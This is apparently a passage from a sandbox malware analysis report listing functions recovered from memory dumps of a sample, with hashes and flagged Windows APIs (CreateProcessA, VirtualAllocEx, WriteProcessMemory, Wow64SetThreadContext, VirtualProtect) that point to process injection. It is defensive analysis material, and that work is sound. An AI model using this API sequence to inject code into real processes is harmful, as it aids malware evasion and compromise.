                                                                                                              Function 08A84E73 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405700497.0000000008A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a80000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,$-
                                                                                                              • API String ID: 0-2049039173
                                                                                                              • Opcode ID: f4629768d5f1dfc9111267efd47447766665edc8a55f6f1cd10b119c0e2b78f6
                                                                                                              • Instruction ID: 3f4cc499a665b5f54d220fe78d71147f53876e44457ce0f66bf5970789aa5545
                                                                                                              • Opcode Fuzzy Hash: f4629768d5f1dfc9111267efd47447766665edc8a55f6f1cd10b119c0e2b78f6
                                                                                                              • Instruction Fuzzy Hash: AF115DB8D01269DFDBA0DF64C984BD9BBB1AB89305F1080DAD819B7740DB355A85DF10
                                                                                                              Function 08A90040 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,q
                                                                                                              • API String ID: 0-196045463
                                                                                                              • Opcode ID: 3cf30db0f05f211805ab4c60d098a7b835030583964062147f0d038369294d4a
                                                                                                              • Instruction ID: 7d87707a83d565d3f787db6d3d7df0b58014c4959417aee1d676a8b6cd55ddfb
                                                                                                              • Opcode Fuzzy Hash: 3cf30db0f05f211805ab4c60d098a7b835030583964062147f0d038369294d4a
                                                                                                              • Instruction Fuzzy Hash: 96521775A002288FDB64CF69C991BDDBBF2BF88301F1581D9E549AB351DA30AD81CF61
                                                                                                              Function 08AA5D9D Relevance: 1.8, APIs: 1, Instructions: 262processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08AA600F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: fe1bc014a92162ce15ade7a9e47022d7f61f75331871216bd9b8f21044c44770
                                                                                                              • Instruction ID: cfbdd41cec302974cfeced3c9212764b72d741d77f26eb692003b2a9d7b6763b
                                                                                                              • Opcode Fuzzy Hash: fe1bc014a92162ce15ade7a9e47022d7f61f75331871216bd9b8f21044c44770
                                                                                                              • Instruction Fuzzy Hash: 65A10271D00258CFDB24CFA9C885BEDBBF1BF09311F149169E858A7650EB788985CF85
                                                                                                              Function 08AA5DA8 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08AA600F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: 08f90c562a65261ea897009affeefd4a254809ab53ebe8d743db85882e2f63c0
                                                                                                              • Instruction ID: 02b5bdc875612f9d1ca91d666f160b7a5bffd138b7e267d787b41f8727a9f5f2
                                                                                                              • Opcode Fuzzy Hash: 08f90c562a65261ea897009affeefd4a254809ab53ebe8d743db85882e2f63c0
                                                                                                              • Instruction Fuzzy Hash: B8A1F371D00258CFDB24CFA9C885BEDBBF1BF09311F149169E858A7640DB789985CF45
                                                                                                              Function 08A90EE8 Relevance: 1.7, Strings: 1, Instructions: 427COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q
                                                                                                              • API String ID: 0-1301096350
                                                                                                              • Opcode ID: bba04a38373aff41524d082652c4942ec758c40d43f688f96719b2ae29dbe4b3
                                                                                                              • Instruction ID: f6614d79ebe4c2dc0c8485fd222fd7680adf00a91136f306d09af2beba3892d4
                                                                                                              • Opcode Fuzzy Hash: bba04a38373aff41524d082652c4942ec758c40d43f688f96719b2ae29dbe4b3
                                                                                                              • Instruction Fuzzy Hash: 93F1D274B082028FEB559F68C4547AEBBF2EFC5202F14456DD8C6DBB91DA38C841CB65
                                                                                                              Function 08AA8994 Relevance: 1.7, APIs: 1, Instructions: 171fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CopyFileA.KERNEL32(?,?,?), ref: 08AA8B1B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CopyFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 1304948518-0
                                                                                                              • Opcode ID: d775315f32fb844b7ab7851882a492235feafbb8f4c7f168a7500c9a61d81aab
                                                                                                              • Instruction ID: 7046da4e7edecaff9bd84a4266660a7f8765f28c981ce18ae81046d5002e72c1
                                                                                                              • Opcode Fuzzy Hash: d775315f32fb844b7ab7851882a492235feafbb8f4c7f168a7500c9a61d81aab
                                                                                                              • Instruction Fuzzy Hash: 586111B0D01318CFDB14DFA9C985BEDBBB1BB49311F249129E855A7A80DB788981CF85
                                                                                                              Function 08AA89A0 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CopyFileA.KERNEL32(?,?,?), ref: 08AA8B1B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CopyFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 1304948518-0
                                                                                                              • Opcode ID: 72110be902b4ab9c19583868c72f9b953b139c82ce039c08b7307c9e67211b41
                                                                                                              • Instruction ID: 0c9a050b0c97ff4b1d33900f1f407cad3f2e48d1b39226f6716222eb1a150030
                                                                                                              • Opcode Fuzzy Hash: 72110be902b4ab9c19583868c72f9b953b139c82ce039c08b7307c9e67211b41
                                                                                                              • Instruction Fuzzy Hash: D2610FB0D0031CCFDB14DFA9C985BEDBBB1BB49311F249129E815A7A80DB788985CF85
                                                                                                              Function 08AA6C21 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08AA6CFB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 7f2386552e104fcb41a7f829866179466969db216cead6d338fc644727d41ea1
                                                                                                              • Instruction ID: 0b82f96af44c75e4a68a24a8b68716d96ebc687b875c7645d19220a357959b30
                                                                                                              • Opcode Fuzzy Hash: 7f2386552e104fcb41a7f829866179466969db216cead6d338fc644727d41ea1
                                                                                                              • Instruction Fuzzy Hash: 7641B9B5D012589FCF10CFA9D984AEEFBF1BB49310F24902AE818B7250C775AA45CF64
                                                                                                              Function 08AA6C28 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08AA6CFB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 96762f9f458b8094a4617677e4bf9c20960ac7f2d9464d3f0352058c0e48d71e
                                                                                                              • Instruction ID: c3dbc30b9d411d848f45186170cc5cd2cc1fd366396e09b20a9584d61c1f1f44
                                                                                                              • Opcode Fuzzy Hash: 96762f9f458b8094a4617677e4bf9c20960ac7f2d9464d3f0352058c0e48d71e
                                                                                                              • Instruction Fuzzy Hash: 2A4189B5D012589FCF10CFA9D984AEEFBF1BB49310F24902AE818B7250D775AA45CF64
                                                                                                              Function 08AA652F Relevance: 1.6, APIs: 1, Instructions: 116threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 08AA6617
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: af2f37421a7e9442dd2dc53b7a118c0eb30b1f5499b7b197e4e906ba2841adde
                                                                                                              • Instruction ID: 68018a6332622451c4997353dfb4bb16480146c6e79032ed1104913f977f6931
                                                                                                              • Opcode Fuzzy Hash: af2f37421a7e9442dd2dc53b7a118c0eb30b1f5499b7b197e4e906ba2841adde
                                                                                                              • Instruction Fuzzy Hash: 3741EDB4D052989FCB14CFA9D884AEEBFF0AF49310F18806AE455B7650C738994ACF64
                                                                                                              Function 08AA6AC0 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08AA6B72
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 2f639cae096de29e491ff619f6a2a82b09bc33773357cc5ad9da29e36506fbb9
                                                                                                              • Instruction ID: 02b295db0b014920512b07dde9789cffac7a013982114d5e04fc257bfa395b29
                                                                                                              • Opcode Fuzzy Hash: 2f639cae096de29e491ff619f6a2a82b09bc33773357cc5ad9da29e36506fbb9
                                                                                                              • Instruction Fuzzy Hash: AB31A8B9D012589FCF10CFA9D984AEEFBB1FB59320F14942AE815B7210C735A946CF64
                                                                                                              Function 08AA6AC8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08AA6B72
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 75778ce0792976ccbb8282b89937a3d980738942c54bb7b0a47053fb9509eedd
                                                                                                              • Instruction ID: 148ddf048203afef88d2f89559de00457ac8717201309979674d940d6fbcbaf4
                                                                                                              • Opcode Fuzzy Hash: 75778ce0792976ccbb8282b89937a3d980738942c54bb7b0a47053fb9509eedd
                                                                                                              • Instruction Fuzzy Hash: 9431A8B8D012589FCF10CFA9D980AEEFBB1BB19320F14942AE814B7210D735A902CF64
                                                                                                              Function 08AA7111 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 08AA71BC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 2682470fc47a229ac61ae60038ade60985f61eb8ee83ca05130d119459ead651
                                                                                                              • Instruction ID: 52fc84981c65e7963e03c5241011e377add0efb69c4f73a0e045696563a33729
                                                                                                              • Opcode Fuzzy Hash: 2682470fc47a229ac61ae60038ade60985f61eb8ee83ca05130d119459ead651
                                                                                                              • Instruction Fuzzy Hash: 6131CAB8D052589FCF10CFA9D984AEEFBF1BB49310F14942AE815B7210D735A945CF64
                                                                                                              Function 08AA7118 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 08AA71BC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: a39d7975e1de93cb8b4fa2987cb075ad976086f413be035db5f48b455d3a2abd
                                                                                                              • Instruction ID: ddbf45dd0d45c8456625cbbf88bc9a0afe6fd9e7238ded9bd9ece2e597d23c6f
                                                                                                              • Opcode Fuzzy Hash: a39d7975e1de93cb8b4fa2987cb075ad976086f413be035db5f48b455d3a2abd
                                                                                                              • Instruction Fuzzy Hash: FA31C9B4D012589FCF10DFAAD880AEEFBF1BB09320F14942AE824B7210D735A945CF64
                                                                                                              Function 08C7D750 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 08C7D7F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1407149684.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8c70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 7ac7f1a1ab763962190e1c2e4e40ab74154c291983b355b819db774b3781f43d
                                                                                                              • Instruction ID: 7d6094a970a0d0dd94f25d3748a594991206056dadd30974fb156571707a792c
                                                                                                              • Opcode Fuzzy Hash: 7ac7f1a1ab763962190e1c2e4e40ab74154c291983b355b819db774b3781f43d
                                                                                                              • Instruction Fuzzy Hash: 6F3199B8D012489FDF14DFA9D980ADEFBB1BF49310F14942AE815B7210D735A945CF94
                                                                                                              Function 08AA6568 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 08AA6617
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 5ea3662c78a19f2bb58360f4f5f488bb12ffc5434a7e34fef56fe147127212f9
                                                                                                              • Instruction ID: 93b171be26077802bfb8849ac7ece90d991beb20a2f499892f6640b553dd77b6
                                                                                                              • Opcode Fuzzy Hash: 5ea3662c78a19f2bb58360f4f5f488bb12ffc5434a7e34fef56fe147127212f9
                                                                                                              • Instruction Fuzzy Hash: 2331CAB4D012589FDB14DFAAD884AEEFBF5BF49310F24802AE419B7240C738A945CF64
                                                                                                              Function 08A940D0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q
                                                                                                              • API String ID: 0-2414175341
                                                                                                              • Opcode ID: 78ddb1336824c481d59537a3948d953478fa651ccef68f594e38449bd415dfb7
                                                                                                              • Instruction ID: 6316fc8cdbb7a178a47ccce7af75fa64841e70ab34cbb84e96247c3449f5d49e
                                                                                                              • Opcode Fuzzy Hash: 78ddb1336824c481d59537a3948d953478fa651ccef68f594e38449bd415dfb7
                                                                                                              • Instruction Fuzzy Hash: A1A1C0357042009FDB199F68D854B6A7BF2FF89311F1585ADE1468B7A2CB36EC42DB80
                                                                                                              Function 08ABEB12 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405919522.0000000008AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8ab0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q
                                                                                                              • API String ID: 0-1807707664
                                                                                                              • Opcode ID: 684c280da35bac3fc6707e85a0e2b7d868db250ba0b37d79e702a9b2235eb6cb
                                                                                                              • Instruction ID: 7a13f04d07d6d9f8fae90dd40157bd620fc6e0afd6b9534527cae9213dee67a7
                                                                                                              • Opcode Fuzzy Hash: 684c280da35bac3fc6707e85a0e2b7d868db250ba0b37d79e702a9b2235eb6cb
                                                                                                              • Instruction Fuzzy Hash: E7A1E934A10618DFCB04DFA4D998ADDB7B6FF88301F158559E406AB762DB30EC42CB80
                                                                                                              Function 08A98880 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q
                                                                                                              • API String ID: 0-2414175341
                                                                                                              • Opcode ID: 73025140f09200c43471beb61cc6c6174967dcc5a98194c29eda1a2521f10294
                                                                                                              • Instruction ID: 4ad24ccc13b661e41f4410ed625f99388e05abbaeff12400a5450f4c97cae762
                                                                                                              • Opcode Fuzzy Hash: 73025140f09200c43471beb61cc6c6174967dcc5a98194c29eda1a2521f10294
                                                                                                              • Instruction Fuzzy Hash: BC717B31E046098FDB14DFA9C5407AEBBF2FFC9211F24852DD589A7B54DB34A902CB52
                                                                                                              Function 08A92960 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q
                                                                                                              • API String ID: 0-1807707664
                                                                                                              • Opcode ID: c79c3a8492f2a7204a73821a411efd8c83afe0502d63e1937c4f22b0ee1f7362
                                                                                                              • Instruction ID: 5a41a399669b2840cd2c45a734c69db378d83b654a6ef83ba9eeee34f93e36f0
                                                                                                              • Opcode Fuzzy Hash: c79c3a8492f2a7204a73821a411efd8c83afe0502d63e1937c4f22b0ee1f7362
                                                                                                              • Instruction Fuzzy Hash: 93715D35B00214AFDB18EB64C464BAEB7F6AFC8702F104458E546AB791CF75EC42CB91
                                                                                                              Function 08AB2C08 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405919522.0000000008AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8ab0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TJq
                                                                                                              • API String ID: 0-48878262
                                                                                                              • Opcode ID: 8384753d02d2611ed7bbf0346e524ea8125a1964af9d15486e03856555728b09
                                                                                                              • Instruction ID: 3641bcbb1c0da7187e44f8d1a307b30b9fb1aaa9ce7483ff37885e9c776058e7
                                                                                                              • Opcode Fuzzy Hash: 8384753d02d2611ed7bbf0346e524ea8125a1964af9d15486e03856555728b09
                                                                                                              • Instruction Fuzzy Hash: A3710474E00208CFEB08DFA9E4496DEBBB6FB89305F208029E916A7355DB346C46CF51
                                                                                                              Function 08AB2C04 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405919522.0000000008AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8ab0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TJq
                                                                                                              • API String ID: 0-48878262
                                                                                                              • Opcode ID: d701c4074e355c6b44e7bc253dfeeb7d7a02a5b7d1c1f23f545433252d70597b
                                                                                                              • Instruction ID: ce068a1b22112fc6bcbbc74180d8a52a83540b06b00860c5087e573642b11600
                                                                                                              • Opcode Fuzzy Hash: d701c4074e355c6b44e7bc253dfeeb7d7a02a5b7d1c1f23f545433252d70597b
                                                                                                              • Instruction Fuzzy Hash: 4871F474E00208DFEB48DFA9E4496DEBBB2FB89305F208029E916A7355DB346D46CF51
                                                                                                              Function 08B7B330 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1406385202.0000000008B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8b70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q
                                                                                                              • API String ID: 0-2414175341
                                                                                                              • Opcode ID: 4c72e436b37e5b027128f94110dd30d6dc86918ba1abf523ed9e8046168ca62d
                                                                                                              • Instruction ID: cace6719b7c1dc9f00f938433cb8226a3752b05dc9e2e499790b1770662464dd
                                                                                                              • Opcode Fuzzy Hash: 4c72e436b37e5b027128f94110dd30d6dc86918ba1abf523ed9e8046168ca62d
                                                                                                              • Instruction Fuzzy Hash: E451B335A00616CFCB10DF58D484AAAFBB5FF85321F158699E5299B381D730E852CFD4
                                                                                                              Function 0419EE28 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1366516662.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4190000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: \sq
                                                                                                              • API String ID: 0-1116441132
                                                                                                              • Opcode ID: 3c317d8834401f9b1e2d25080cf215823a7245dc14a5cf2c6978436c629c813e
                                                                                                              • Instruction ID: 5f7278d8dab1411f0bdf5c65d787205433abdeb86a05780063b9c67398a3c962
                                                                                                              • Opcode Fuzzy Hash: 3c317d8834401f9b1e2d25080cf215823a7245dc14a5cf2c6978436c629c813e
                                                                                                              • Instruction Fuzzy Hash: CD515830B00205CFDB24CF69D484BBAB7E2FB88710F1985B5E5098B291EB31AC41CF80
                                                                                                              Function 08A93208 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q
                                                                                                              • API String ID: 0-1807707664
                                                                                                              • Opcode ID: 5899e210ed187d1ca717e0a69a3e3a5c3a59d12ae92aad34c334066556bd8164
                                                                                                              • Instruction ID: 2b326adc44b3498bdb51d22f4fae29e218a1113f17618b6141e0741249327162
                                                                                                              • Opcode Fuzzy Hash: 5899e210ed187d1ca717e0a69a3e3a5c3a59d12ae92aad34c334066556bd8164
                                                                                                              • Instruction Fuzzy Hash: E1417F34B106148FCB14AB68C864BAEB7BAEFC8701F10442DD407AB795DF749C06CB91
                                                                                                              Function 08B7C230 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1406385202.0000000008B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8b70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,q
                                                                                                              • API String ID: 0-196045463
                                                                                                              • Opcode ID: 2652ab4ed9e54ea95281d19b935aa69b2db2aa279ad66aa4f134618283fd37df
                                                                                                              • Instruction ID: 23e207186ebf046172dd084644eff95fef7323664ec25f1ed60a05117216a3db
                                                                                                              • Opcode Fuzzy Hash: 2652ab4ed9e54ea95281d19b935aa69b2db2aa279ad66aa4f134618283fd37df
                                                                                                              • Instruction Fuzzy Hash: 2F419E35B002048FDB14DF69D494AAEBBF2FF89211B1581A9E906DF361DB31EC42CB91
                                                                                                              Function 08A92800 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
